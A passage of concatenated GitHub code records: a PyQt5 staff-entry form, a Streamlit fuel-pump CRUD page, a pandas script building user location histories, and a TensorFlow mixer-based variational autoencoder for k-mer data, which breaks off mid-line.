\"target_folder\":class_name, \"target_index\": class_id}\n if \"target_name\" in self.item.__dict__['names']:\n _itemkw[\"target_name\"] = self.target_names[class_id]\n class_samples.append(self._make_item(**_itemkw))\n i += 1\n samples.append(class_samples)\n\n self.samples = samples\n if self.ordered:\n self.samples = list_transpose(samples, self.ordered)\n else:\n self.samples = list_flatten(samples, depth=1)\n\n\n def _get_target_names(self) -> None:\n self.target_names = []\n ## implementation of mapping between folders and names\n ## eg. 
with ImageNet\n # from nltk.corpus import wordnet\n # self.target_names = []\n # if self.classes:\n # for wni in self.classes:\n # tgt = wordnet.synset_from_pos_and_offset(wni[0], int(wni[1:])).lemma_names('eng')[0]\n # self.target_names.append(tgt)\n","repo_name":"xvdp/magi","sub_path":"magi/datasets/folder.py","file_name":"folder.py","file_ext":"py","file_size_in_byte":8483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14923394169","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom Metodi.Metodi import Metodi\nfrom Staff.Model.Staff import Staff\nfrom Staff.Controller.ControllerStaff import ControllerStaff\n\n\nclass ViewAggiungiStaff(object):\n objMetodi = Metodi()\n\n def __init__(self, aggiorna_staff):\n self.aggiorna_staff = aggiorna_staff\n self.controller = ControllerStaff()\n\n def salva_nuovo_dipendente(self):\n try:\n if self.txtNome.text() != \"\" and self.txtCognome.text() != \"\" and self.txtCodiceFiscale.text() != \"\" \\\n and self.txtOre.text() != \"\" and self.txtTitolo.text() != \"\":\n if self.controller.controlla_unicita(self.txtCodiceFiscale.text()):\n nuovo_dipendente = Staff(self.txtNome.text(), self.txtCognome.text(), self.txtCodiceFiscale.text(),\n self.txtOre.text(), self.txtTitolo.text(), \"1\")\n self.controller.aggiungi_dipendente(nuovo_dipendente)\n self.aggiorna_staff()\n self.objMetodi.show_popup_ok(\"Elemento aggiunto con successo.\")\n self.view_aggiungi_staff.close()\n else:\n self.objMetodi.show_popup_exception(\"Utente già registrato.\")\n else:\n self.objMetodi.show_popup_exception(\"Uno o più campi risultano vuoti.\")\n except(Exception):\n self.objMetodi.show_popup_exception(\"Errore\")\n\n def cancella_riempimento(self):\n self.txtNome.setText(\"\")\n self.txtCognome.setText(\"\")\n self.txtCodiceFiscale.setText(\"\")\n self.txtOre.setText(\"\")\n self.txtTitolo.setText(\"\")\n\n def setupUi(self, MainWindow):\n self.view_aggiungi_staff = MainWindow\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(670, 514)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.lblTitle = QtWidgets.QLabel(self.centralwidget)\n self.lblTitle.setGeometry(QtCore.QRect(30, 30, 601, 91))\n font = QtGui.QFont()\n font.setFamily(\"MS Serif\")\n font.setPointSize(21)\n self.lblTitle.setFont(font)\n self.lblTitle.setObjectName(\"lblTitle\")\n self.txtNome = QtWidgets.QLineEdit(self.centralwidget)\n self.txtNome.setGeometry(QtCore.QRect(280, 150, 151, 31))\n self.txtNome.setObjectName(\"txtNome\")\n self.lblNome = QtWidgets.QLabel(self.centralwidget)\n self.lblNome.setGeometry(QtCore.QRect(180, 150, 91, 31))\n font = QtGui.QFont()\n font.setPointSize(11)\n self.lblNome.setFont(font)\n self.lblNome.setObjectName(\"lblNome\")\n self.lblCognome = QtWidgets.QLabel(self.centralwidget)\n self.lblCognome.setGeometry(QtCore.QRect(160, 190, 111, 31))\n font = QtGui.QFont()\n font.setPointSize(11)\n self.lblCognome.setFont(font)\n self.lblCognome.setObjectName(\"lblCognome\")\n self.lblCodiceFiscale = QtWidgets.QLabel(self.centralwidget)\n self.lblCodiceFiscale.setGeometry(QtCore.QRect(130, 230, 141, 31))\n font = QtGui.QFont()\n font.setPointSize(11)\n self.lblCodiceFiscale.setFont(font)\n self.lblCodiceFiscale.setObjectName(\"lblCodiceFiscale\")\n self.txtCodiceFiscale = QtWidgets.QLineEdit(self.centralwidget)\n self.txtCodiceFiscale.setGeometry(QtCore.QRect(280, 230, 151, 31))\n self.txtCodiceFiscale.setObjectName(\"txtCodiceFiscale\")\n 
self.lblOre = QtWidgets.QLabel(self.centralwidget)\n self.lblOre.setGeometry(QtCore.QRect(120, 270, 151, 31))\n font = QtGui.QFont()\n font.setPointSize(11)\n self.lblOre.setFont(font)\n self.lblOre.setObjectName(\"lblOre\")\n self.txtOre = QtWidgets.QLineEdit(self.centralwidget)\n self.txtOre.setGeometry(QtCore.QRect(280, 270, 151, 31))\n self.txtOre.setObjectName(\"txtOre\")\n self.lblTitolo = QtWidgets.QLabel(self.centralwidget)\n self.lblTitolo.setGeometry(QtCore.QRect(120, 310, 151, 31))\n font = QtGui.QFont()\n font.setPointSize(11)\n self.lblTitolo.setFont(font)\n self.lblTitolo.setObjectName(\"lblTitolo\")\n self.btnAnnulla = QtWidgets.QPushButton(self.centralwidget)\n self.btnAnnulla.setGeometry(QtCore.QRect(260, 370, 131, 31))\n self.btnAnnulla.setObjectName(\"btnAnnulla\")\n self.btnSalva = QtWidgets.QPushButton(self.centralwidget)\n self.btnSalva.setGeometry(QtCore.QRect(400, 370, 121, 31))\n self.btnSalva.setObjectName(\"btnSalva\")\n self.txtCognome = QtWidgets.QLineEdit(self.centralwidget)\n self.txtCognome.setGeometry(QtCore.QRect(280, 190, 151, 31))\n self.txtCognome.setObjectName(\"txtCognome\")\n self.txtTitolo = QtWidgets.QLineEdit(self.centralwidget)\n self.txtTitolo.setGeometry(QtCore.QRect(280, 310, 151, 31))\n self.txtTitolo.setObjectName(\"txtTitolo\")\n self.btnIndietro = QtWidgets.QPushButton(self.centralwidget)\n self.btnIndietro.setGeometry(QtCore.QRect(530, 370, 131, 31))\n self.btnIndietro.setObjectName(\"pushButton\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 670, 26))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n self.btnSalva.clicked.connect(self.salva_nuovo_dipendente)\n self.btnAnnulla.clicked.connect(self.cancella_riempimento)\n self.btnIndietro.clicked.connect(self.view_aggiungi_staff.close)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Assunzione\"))\n self.lblTitle.setText(_translate(\"MainWindow\",\n \"
Aggiungi un membro dello staff
\"))\n self.lblNome.setText(_translate(\"MainWindow\", \"Nome\"))\n self.lblCognome.setText(_translate(\"MainWindow\", \"Cognome\"))\n self.lblCodiceFiscale.setText(_translate(\"MainWindow\", \"Codice fiscale\"))\n self.lblOre.setText(_translate(\"MainWindow\", \"Ore settimanali\"))\n self.lblTitolo.setText(_translate(\"MainWindow\", \"
Mansione
\"))\n self.btnAnnulla.setText(_translate(\"MainWindow\", \"Cancella\"))\n self.btnSalva.setText(_translate(\"MainWindow\", \"Salva\"))\n self.btnIndietro.setText(_translate(\"MainWindow\", \"Indietro\"))\n","repo_name":"LosaMatteo/ProgettoPalestra","sub_path":"Staff/View/ViewAggiungiStaff.py","file_name":"ViewAggiungiStaff.py","file_ext":"py","file_size_in_byte":6827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14677635592","text":"import streamlit as st;\r\nimport controllers.bombaController as bombaController\r\nimport Paginas.bomba.cadastrar_bomba as paginaCadastrarBomba\r\n\r\n\r\ndef consulta_bomba():\r\n parametroId = st.experimental_get_query_params()\r\n if parametroId.get(\"Id\") == None:\r\n st.experimental_set_query_params()\r\n st.title(\"Consultar Bomba\") \r\n colunas = st.columns((1, 2, 2, 1.5))\r\n campos = ['Id Bomba', 'Id Combustível', 'Excluir', 'Alterar']\r\n for col, campo_nome in zip(colunas, campos):\r\n col.write(campo_nome)\r\n\r\n for item in bombaController.selecionarBomba():\r\n col1, col2, col3, col4 = st.columns((1, 2, 2, 1.5))\r\n col1.write(item.bomba_id)\r\n col2.write(item.combustivel_id)\r\n botao_espaco_excluir = col3.empty()\r\n botao_excluir = botao_espaco_excluir.button('Excluir', 'btnExcluir' + str(item.bomba_id))\r\n botao_espaco_alterar = col4.empty()\r\n botao_alterar = botao_espaco_alterar.button('Alterar', 'btnAlterar' + str(item.bomba_id))\r\n\r\n if botao_excluir:\r\n bombaController.excluirBomba(item.bomba_id)\r\n botao_espaco_excluir.button('Excluído', 'btnExcluir1' + str(item.bomba_id))\r\n if botao_alterar:\r\n st.experimental_set_query_params(\r\n Id=[item.bomba_id]\r\n )\r\n st.experimental_rerun()\r\n else:\r\n botaoVoltar = st.button(\"Voltar\")\r\n if botaoVoltar:\r\n st.experimental_set_query_params()\r\n st.experimental_rerun()\r\n\r\n paginaCadastrarBomba.cadastrar_bomba()","repo_name":"tSantosDev/crud-python-streamlit","sub_path":"Paginas/bomba/consulta_bomba.py","file_name":"consulta_bomba.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"43567393617","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script collects location history per user into tuples containing UTC\r\ntimestamp and coordinates. This script should be run before reverse geocoding.\r\n\r\nUsage:\r\n Execute the script from the command line using the following command:\r\n\r\n python3 reverse_geocode.py -i input.pkl -o output.pkl\r\n\r\nArguments:\r\n -i/--input: Path to the pandas DataFrame containing posts.\r\n -o/--output: Path to the output pandas DataFrame containing location\r\n histories.\r\n -c/--column: Name of the timestamp column\r\n -lt/--localtime: Specify whether local time column is added into\r\n dataframe. 
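A hedged sketch of the per-row button pattern used by consulta_bomba in the Streamlit record above: each button gets a unique key derived from the row id so Streamlit can distinguish the widgets across reruns. The items list is hypothetical stand-in data.

import streamlit as st

items = [{'id': 1, 'name': 'Bomba A'}, {'id': 2, 'name': 'Bomba B'}]
for item in items:
    col1, col2 = st.columns((2, 1))
    col1.write(item['name'])
    # a unique key per row keeps each button's state separate across reruns
    if col2.button('Excluir', key='btnExcluir' + str(item['id'])):
        st.write('would delete id', item['id'])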
If local time is not required, don't use -lt flag.\r\n\r\nOutput:\r\n A pandas DataFrame containing the location histories of users.\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport argparse\r\nimport pytz\r\n\r\n# Set up the argument parser\r\nap = argparse.ArgumentParser()\r\n\r\n# Define arguments\r\nap.add_argument(\"-i\", \"--input\", required=True,\r\n help=\"Path to the DataFrame containing geotagged posts.\")\r\nap.add_argument(\"-o\", \"--output\", required=True,\r\n help=\"Path to the output dataframe with location history.\")\r\nap.add_argument(\"-c\", \"--column\", required=False,\r\n help=\"The name of the column containing the UTC timestamp\")\r\nap.add_argument(\"-lt\", \"--localtime\", required=False,\r\n help=\"Specify whether time_created_local column is created\")\r\n\r\n\r\n# Parse arguments\r\nargs = vars(ap.parse_args())\r\n\r\n# Check if DataFrame input column has been set manually\r\nif args['column'] is not None:\r\n inputcol = args['column']\r\nelse:\r\n inputcol = 'time_created_utc'\r\n\r\n# Assign arguments to variables\r\nprint('[INFO] - Reading pickled input dataframe in')\r\ninput_df = pd.read_pickle(args['input'])\r\n\r\n# Retrieve original input dataframe columns\r\ncollist = list(input_df.columns)\r\n\r\n# Create timestamp and location tuples\r\nprint('[INFO] - Creating time and coordinate tuples')\r\ninput_df['date_loc'] = None # create empty series\r\ninput_df['date_loc'] = input_df['date_loc'].astype(object) # force object dtype\r\nfor i, row in input_df.iterrows():\r\n input_df.at[i, 'date_loc'] = tuple([row[inputcol], row.geometry])\r\n\r\n# input_df['date_loc'] = input_df[[inputcol,'geometry']].apply(tuple, axis=1)\r\n\r\n# Group by user_id and create sorted location history\r\nprint('[INFO] - Grouping location history per user')\r\ngrp = input_df.groupby('user_id', as_index=False).agg(lambda x: list(x))\r\ngrp['location_hist'] = grp['date_loc'].apply(sorted)\r\n\r\n# Merge dataframes on user_id\r\nprint('[INFO] - Joining location histories to user ids')\r\nmerged = pd.merge(input_df, grp, on='user_id', sort=False, suffixes=('', '_y'))\r\n\r\n# Finalize column list for output\r\ncollist.extend(['location_hist'])\r\n\r\n# Join location history series to dataframe by user_id\r\noutput_df = merged[collist]\r\n\r\n# Check whether local time zone was requested\r\nif args['localtime'] is not None:\r\n print('[INFO] - Local time stamps requested!')\r\n # Convert the datetime in the column 'time_created_utc' to local time\r\n # (GMT+2). Begin by defining the source and target zones.\r\n from_zone = pytz.timezone('UTC')\r\n to_zone = pytz.timezone('Europe/Helsinki') # change this to your timezone if needed\r\n print('[INFO] - Creating local time stamps...')\r\n # Loop over output dataframe\r\n for ix, row in output_df.iterrows():\r\n # Fetch the datetime\r\n time_created_utc = row['time_created_utc']\r\n\r\n # Tell the naive datetime that it's UTC\r\n time_created_utc = time_created_utc.replace(tzinfo=from_zone)\r\n\r\n # Convert the datetime to local timezone\r\n time_created_local = time_created_utc.astimezone(to_zone)\r\n\r\n # Add local time\r\n output_df.at[ix, 'time_created_local'] = time_created_local\r\nelse:\r\n print('[INFO] - No local time stamps requested, moving on...')\r\n pass\r\n\r\n# Save output dataframe as pickle\r\nprint('[INFO] - Saving output dataframe to pickle')\r\noutput_df.to_pickle(args['output'])\r\nprint('[INFO] - ... 
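The UTC-to-local conversion in the script above can be checked in isolation; this sketch uses the same pytz zones with a hypothetical timestamp.

import datetime
import pytz

from_zone = pytz.timezone('UTC')
to_zone = pytz.timezone('Europe/Helsinki')

naive = datetime.datetime(2020, 6, 1, 12, 0, 0)   # naive timestamp, assumed UTC
aware = naive.replace(tzinfo=from_zone)           # mark it as UTC
print(aware.astimezone(to_zone))                  # 2020-06-01 15:00:00+03:00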
Done!')\r\n","repo_name":"DigitalGeographyLab/some-lingscapes","sub_path":"spatial/location_history_creator.py","file_name":"location_history_creator.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"35950760844","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom joblib import dump\nfrom sklearn import preprocessing as pr\n\nimport tensorflow as tf\nimport tensorflow_addons as tfa\n\nfrom tensorflow import keras\nfrom tensorflow.keras import backend as K \nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.layers import Input, Activation\nfrom tensorflow.keras.layers import Conv2D, Dense, Layer, BatchNormalization\nfrom tensorflow.keras.layers import Flatten, Reshape, LayerNormalization, GlobalAveragePooling1D\n\nglobalSeed=768\nfrom numpy.random import seed \nseed(globalSeed)\ntf.compat.v1.set_random_seed(globalSeed)\n\n#This piece of code is only used if you have a Nvidia RTX or GTX1660 TI graphics card\n#for some reason convolutional layers do not work poperly on those graphics cards \n\ngpus= tf.config.experimental.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(gpus[0], True)\n\n###############################################################################\n# Visualization functions\n###############################################################################\n\ndef PlotStyle(Axes): \n \"\"\"\n Parameters\n ----------\n Axes : Matplotlib axes object\n Applies a general style to the matplotlib object\n\n Returns\n -------\n None.\n \"\"\" \n Axes.spines['top'].set_visible(False)\n Axes.spines['bottom'].set_visible(True)\n Axes.spines['left'].set_visible(True)\n Axes.spines['right'].set_visible(False)\n Axes.xaxis.set_tick_params(labelsize=12)\n Axes.yaxis.set_tick_params(labelsize=12)\n\n###############################################################################\n# Network definition\n###############################################################################\n\nclass KLDivergenceLayer(Layer):\n '''\n Custom KL loss layer\n '''\n def __init__(self,*args,**kwargs):\n self.annealing = tf.Variable(10**-16,dtype=tf.float32,trainable = False)\n self.is_placeholder=True\n super(KLDivergenceLayer,self).__init__(*args,**kwargs)\n \n def call(self,inputs):\n \n Mu,LogSigma=inputs\n klbatch=-0.5*self.annealing*K.sum(1+LogSigma-K.square(Mu)-K.exp(LogSigma),axis=-1)\n self.add_loss(K.mean(klbatch),inputs=inputs)\n self.add_metric(klbatch,name='kl_loss',aggregation='mean')\n \n return inputs\n\nclass Sampling(Layer):\n '''\n Custom sampling layer\n '''\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n \n def get_config(self):\n config = {}\n base_config = super().get_config()\n return {**base_config, **config}\n \n @tf.autograph.experimental.do_not_convert \n def call(self,inputs,**kwargs):\n \n Mu,LogSigma=inputs\n batch=tf.shape(Mu)[0]\n dim=tf.shape(Mu)[1]\n epsilon=K.random_normal(shape=(batch,dim))\n\n return Mu+(K.exp(0.5*LogSigma))*epsilon\n\nclass SpatialAttention(Layer):\n '''\n Custom Spatial attention layer\n '''\n \n def __init__(self,size, **kwargs):\n super(SpatialAttention, self).__init__()\n self.size = size\n self.kwargs = kwargs\n \n def get_config(self):\n cfg = super().get_config()\n return cfg \n\n\n def build(self, input_shapes):\n self.conv = Conv2D(filters=1, kernel_size=self.size, strides=1, padding='same')\n\n def call(self, 
inputs):\n pooled_channels = tf.concat(\n [tf.math.reduce_max(inputs, axis=3, keepdims=True),\n tf.math.reduce_mean(inputs, axis=3, keepdims=True)],\n axis=3)\n\n scale = self.conv(pooled_channels)\n scale = tf.math.sigmoid(scale)\n\n return inputs * scale\n \n\nclass Patches(Layer):\n '''\n Taken from\n https://keras.io/examples/vision/mlp_image_classification/\n '''\n def __init__(self, patch_size, num_patches):\n super(Patches, self).__init__()\n self.patch_size = patch_size\n self.num_patches = num_patches\n \n def get_config(self):\n cfg = super().get_config()\n return cfg \n \n @tf.autograph.experimental.do_not_convert\n def call(self, images,**kwargs):\n \n batch_size = tf.shape(images)[0]\n patches = tf.image.extract_patches(\n images=images,\n sizes=[1, self.patch_size, self.patch_size, 1],\n strides=[1, self.patch_size, self.patch_size, 1],\n rates=[1, 1, 1, 1],\n padding=\"VALID\",\n )\n patch_dims = patches.shape[-1]\n patches = tf.reshape(patches, [batch_size, self.num_patches, patch_dims])\n return patches\n\n\nclass MLPMixerLayer(Layer):\n '''\n Taken from\n https://keras.io/examples/vision/mlp_image_classification/\n '''\n def __init__(self, num_patches, hidden_units, dropout_rate, *args, **kwargs):\n super(MLPMixerLayer, self).__init__(*args, **kwargs)\n\n self.mlp1 = keras.Sequential(\n [\n Dense(units=num_patches),\n BatchNormalization(),\n tfa.layers.GELU(approximate=True),\n BatchNormalization(),\n Dense(units=num_patches),\n ]\n )\n self.mlp2 = keras.Sequential(\n [\n Dense(units=num_patches),\n BatchNormalization(),\n tfa.layers.GELU(approximate=True),\n Dense(units=hidden_units),\n BatchNormalization(),\n ]\n )\n self.normalize = LayerNormalization(epsilon=1e-6)\n \n def get_config(self):\n cfg = super().get_config()\n return cfg \n \n @tf.autograph.experimental.do_not_convert\n def call(self, inputs,**kwargs):\n # Apply layer normalization.\n x = self.normalize(inputs)\n # Transpose inputs from [num_batches, num_patches, hidden_units] to [num_batches, hidden_units, num_patches].\n x_channels = tf.linalg.matrix_transpose(x)\n # Apply mlp1 on each channel independently.\n mlp1_outputs = self.mlp1(x_channels)\n # Transpose mlp1_outputs from [num_batches, hidden_dim, num_patches] to [num_batches, num_patches, hidden_units].\n mlp1_outputs = tf.linalg.matrix_transpose(mlp1_outputs)\n # Add skip connection.\n x = mlp1_outputs + inputs\n # Apply layer normalization.\n x_patches = self.normalize(x)\n # Apply mlp2 on each patch independtenly.\n mlp2_outputs = self.mlp2(x_patches)\n # Add skip connection.\n x = x + mlp2_outputs\n return x\n\n#Wrapper function, creates a small Functional keras model \n#Bottleneck of the variational autoencoder \ndef MakeVariationalNetwork(Latent):\n \n InputFunction=Input(shape=(Latent,))\n Mu=Dense(Latent)(InputFunction)\n LogSigma=Dense(Latent)(InputFunction)\n Mu,LogSigma=KLDivergenceLayer()([Mu,LogSigma])\n Output=Sampling()([Mu,LogSigma])\n variationalBottleneck=Model(inputs=InputFunction,outputs=Output)\n \n return InputFunction,variationalBottleneck\n\ndef MakeBottleneck(InputShape,Latent,UpSampling=False):\n '''\n Parameters\n ----------\n InputShape : tuple\n input shape of the previous convolutional layer.\n Latent : int\n Dimentionality of the latent space.\n UpSampling : bool, optional\n Controls the sampling behaviour of the network.\n The default is False.\n\n Returns\n -------\n InputFunction : Keras functional model input\n input of the network.\n localCoder : Keras functional model\n Coder model, transition layer of the 
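The Patches layer above splits an image into non-overlapping patch_size x patch_size blocks; the same split can be written in plain NumPy to check the shape arithmetic. The 8x8 image and patch size 4 are hypothetical small values.

import numpy as np

img = np.arange(8 * 8).reshape(8, 8)
p = 4
num_patches = (8 // p) * (8 // p)                 # 4 patches
patches = (img.reshape(8 // p, p, 8 // p, p)      # split rows/cols into blocks
              .transpose(0, 2, 1, 3)              # group the two block axes
              .reshape(num_patches, p * p))
print(patches.shape)                              # (4, 16) -> [num_patches, patch_dims]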
bottleneck.\n\n '''\n \n Units=[np.product(InputShape),Latent]\n \n if UpSampling:\n finalUnits=Units[::-1]\n InputFunction=Input(shape=(Latent,))\n X=Dense(finalUnits[0],use_bias=False)(InputFunction)\n \n else:\n finalUnits=Units\n InputFunction=Input(shape=InputShape)\n X=Flatten()(InputFunction)\n X=Dense(finalUnits[0],use_bias=False)(X)\n \n \n X=BatchNormalization()(X)\n X=Activation('relu')(X)\n X=Dense(finalUnits[1],use_bias=False)(X)\n X=BatchNormalization()(X)\n \n if UpSampling:\n X=Activation('relu')(X)\n Output=Reshape(InputShape)(X)\n else:\n Output=Activation('relu')(X)\n \n Bottleneck=Model(inputs=InputFunction,outputs=Output)\n \n return InputFunction,Bottleneck\n\ndef MakeMixerBlock(inputs,blocks,patch_size,num_patches,embedding_dim,dropout_rate):\n '''\n Parameters\n ----------\n inputs : keras layer\n Input of the mixer block.\n blocks : keras sequential model\n mixer blocks.\n patch_size : int\n size of the image patch, same for each dimention.\n num_patches : int\n number of patches per image.\n embedding_dim : int\n size of the embedding dimention in the mixer block.\n dropout_rate : float\n droput rate in the mixer block.\n\n Returns\n -------\n representation : keras layer \n DESCRIPTION.\n\n '''\n \n patches = Patches(patch_size, num_patches)(inputs)\n x = Dense(units=embedding_dim,use_bias=False)(patches)\n x = blocks(x)\n x = GlobalAveragePooling1D()(x)\n x = BatchNormalization()(x)\n reshapeDim = np.sqrt(embedding_dim).astype(int)\n representation = Reshape((reshapeDim,reshapeDim,1))(x)\n \n return representation\n\ndef MakeMixerCoder(InputShape,Units,NumBlocks,DropoutRate=0.2,UpSampling=False):\n '''\n Parameters\n ----------\n InputShape : tuple\n Input shape of the network.\n Units : array-like\n Contains the dimentionality of the embedding dimentions.\n NumBlocks : int\n Number of mixer blocks.\n DropoutRate : float, optional\n Dropout rate of the mixer block. The default is 0.2.\n PatchSize : int, optional\n size of the segmented patch in the image. 
The default is 4.\n UpSampling : bool, optional\n Controls the upsamplig or downsampling behaviour of the network.\n The default is False.\n\n Returns\n -------\n InputFunction : Keras functional model input\n input of the network.\n localCoder : Keras functional model\n Coder model, main body of the autoencoder.\n\n '''\n \n if UpSampling:\n EmbeddingDimentions=Units[::-1]\n else:\n EmbeddingDimentions=Units\n \n currentSize = np.sqrt(EmbeddingDimentions[0]).astype(int)\n PatchSize = currentSize//2\n num_patches = (currentSize//PatchSize)**2\n \n InputFunction = Input(shape = InputShape)\n X = SpatialAttention(3)(InputFunction)\n X = BatchNormalization()(X)\n MBlocks = keras.Sequential(\n [MLPMixerLayer(num_patches, EmbeddingDimentions[0], DropoutRate) for _ in range(NumBlocks)]\n )\n \n X = MakeMixerBlock(X,MBlocks,PatchSize,num_patches,EmbeddingDimentions[0],DropoutRate)\n\n for k in range(1,len(EmbeddingDimentions)):\n \n currentSize = np.sqrt(EmbeddingDimentions[k-1]).astype(int)\n PatchSize = currentSize//2\n num_patches = (currentSize//PatchSize)**2\n \n X = SpatialAttention(3)(X)\n X = BatchNormalization()(X)\n MBlocks = keras.Sequential(\n [MLPMixerLayer(num_patches, EmbeddingDimentions[k], DropoutRate) for _ in range(NumBlocks)]\n )\n X = MakeMixerBlock(X,MBlocks,PatchSize,num_patches,EmbeddingDimentions[k],DropoutRate)\n \n\n if UpSampling:\n Output = Activation('sigmoid')(X)\n localCoder = Model(inputs=InputFunction,outputs=Output)\n \n else:\n localCoder = Model(inputs=InputFunction,outputs=X)\n \n return InputFunction,localCoder\n\n#Wrapper function joins the Coder function and the bottleneck function \n#to create a simple autoencoder\ndef MakeMixerAutoencoder(InputShape,Units,BlockSize):\n \n InputEncoder,Encoder=MakeMixerCoder(InputShape,Units,BlockSize)\n #Encoder.summary()\n EncoderOutputShape=Encoder.layers[-1].output_shape\n BottleneckInputShape=EncoderOutputShape[1::]\n InputBottleneck,Bottleneck=MakeBottleneck(BottleneckInputShape,2)\n ConvEncoderOutput=Bottleneck(Encoder(InputEncoder))\n \n ConvEncoder=Model(inputs=InputEncoder,outputs=ConvEncoderOutput)\n \n rInputBottleneck,rBottleneck=MakeBottleneck(BottleneckInputShape,2,UpSampling=True)\n InputDecoder,Decoder=MakeMixerCoder(BottleneckInputShape,Units,BlockSize,UpSampling=True)\n ConvDecoderOutput=Decoder(rBottleneck(rInputBottleneck))\n ConvDecoder=Model(inputs=rInputBottleneck,outputs=ConvDecoderOutput)\n \n ConvAEoutput=ConvDecoder(ConvEncoder(InputEncoder))\n ConvAE=Model(inputs=InputEncoder,outputs=ConvAEoutput)\n \n return InputEncoder,InputDecoder,ConvEncoder,ConvDecoder,ConvAE\n\n# Wrapper functon, joins the autoencoder function with the custom variational\n#layers to create an autoencoder\ndef MakeMixerVariationalAutoencoder(InputShape,Units,BlockSize):\n \n InputEncoder,InputDecoder,ConvEncoder,ConvDecoder,_=MakeMixerAutoencoder(InputShape,Units,BlockSize)\n \n InputVAE,VAE=MakeVariationalNetwork(2)\n VAEencoderOutput=VAE(ConvEncoder(InputEncoder))\n ConvVAEencoder=Model(inputs=InputEncoder,outputs=VAEencoderOutput)\n \n VAEOutput=ConvDecoder(ConvVAEencoder(InputEncoder))\n ConvVAEAE=Model(inputs=InputEncoder,outputs=VAEOutput)\n \n return InputEncoder,InputDecoder,ConvVAEencoder,ConvDecoder,ConvVAEAE\n\n###############################################################################\n# Auxiliary functions\n###############################################################################\n\n#Custom callback, scales the KL-loss \nclass KLAnnealing(keras.callbacks.Callback):\n\n def __init__(self,position, 
weigths):\n super().__init__()\n self.position = position\n self.weigths = tf.Variable(weigths,trainable=False,dtype=tf.float32)\n\n def on_epoch_end(self, epoch,logs=None):\n \n weights = self.model.get_weights()\n weights[self.position] = self.weigths[epoch]\n self.model.set_weights(weights)\n\n\ndef MakeAnnealingWeights(epochs,cycles,scale=1):\n '''\n Parameters\n ----------\n epochs : int\n min size of the array to return.\n cycles : int\n number of annealing cycles.\n scale : float, optional\n scales the annealing weights. The default is 1.\n\n Returns\n -------\n array\n annealing weights.\n\n '''\n \n pointspercycle = epochs//cycles\n AnnealingWeights = 1*(1/(1+np.exp(-1*np.linspace(-10,10,num=pointspercycle))))\n \n for k in range(cycles-1):\n AnnealingWeights = np.append(AnnealingWeights,1*(1/(1+np.exp(-1*np.linspace(-10,10,num=pointspercycle+1)))))\n \n return scale*AnnealingWeights\n\n###############################################################################\n# Data loading \n###############################################################################\n\nfoldsPath = r'/media/tavoglc/Datasets/datasets/main/splits'\n\nTrainFolds = pd.read_csv(foldsPath+'/train.csv')\nTestFolds = pd.read_csv(foldsPath+'/test.csv')\nValidation = pd.read_csv(foldsPath+'/validation.csv')\n\nComplete = pd.read_csv(foldsPath+'/complete.csv')\n\nDataPath = r\"/media/tavoglc/Datasets/datasets/DABE/LifeSciences/COVIDSeqs/nov2021\"\nDataDir = DataPath+'/KmerDataExt.csv'\n\noutputPath = r'/media/tavoglc/Datasets/datasets/main/models/Model02'\n\n###############################################################################\n# Data selection\n###############################################################################\n\nKmerData = pd.read_csv(DataDir)\nKmerData['id'] = [val[0:-2] for val in KmerData['id']]\nKmerData = KmerData.set_index('id')\n\n###############################################################################\n# Network hyperparameters\n###############################################################################\n\nArch = [37**2,(37//2)**2,(37//4)**2,(37//8)**2]\n \nlr = 0.00075\nminlr = 0.000001 \nepochs = 70 \nbatch_size = 256\ndecay=2*(lr-minlr)/epochs\ninShape = (37,37,1)\nsh = 0.00001\nAnnealingWeights = MakeAnnealingWeights(epochs,4,scale=sh)\n\n###############################################################################\n# Kfold cross validation\n###############################################################################\n\nScalersContainer = []\nEncoderContainer = []\nAEContainer = []\nHistoryContainer = []\n\nfoldNames = ['Fold0', 'Fold1', 'Fold2', 'Fold3', 'Fold4']\n\nfor fold in foldNames:\n \n trainLabels = TrainFolds[fold]\n testLabels = TestFolds[fold]\n \n trainData = np.array(KmerData.loc[trainLabels])\n testData = np.array(KmerData.loc[testLabels])\n \n scaler = pr.MinMaxScaler()\n scaler.fit(trainData)\n \n trainData = scaler.transform(trainData)\n testData = scaler.transform(testData)\n \n trainData = np.array([np.array(list(val)+[0,0,0,0,0]).reshape((37,37)) for val in trainData]).reshape((-1,37,37,1))\n testData = np.array([np.array(list(val)+[0,0,0,0,0]).reshape((37,37)) for val in testData]).reshape((-1,37,37,1))\n \n\n datasetTrain = tf.data.Dataset.from_tensor_slices((trainData,trainData))\n datasetTest = tf.data.Dataset.from_tensor_slices((testData,testData))\n \n datasetTrain = datasetTrain.shuffle(buffer_size=100,seed=125)\n datasetTrain = datasetTrain.batch(batch_size)\n datasetTrain = datasetTrain.prefetch(2)\n \n datasetTest = 
